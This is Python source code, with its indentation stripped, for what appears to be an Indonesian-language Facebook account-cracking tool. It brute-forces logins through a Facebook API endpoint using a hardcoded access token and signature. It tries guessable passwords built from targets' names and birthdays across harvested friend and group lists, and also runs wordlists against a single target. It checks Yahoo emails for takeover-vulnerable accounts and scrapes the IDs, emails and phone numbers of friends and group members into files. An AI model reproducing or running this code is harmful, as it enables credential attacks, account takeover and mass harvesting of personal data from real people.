global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
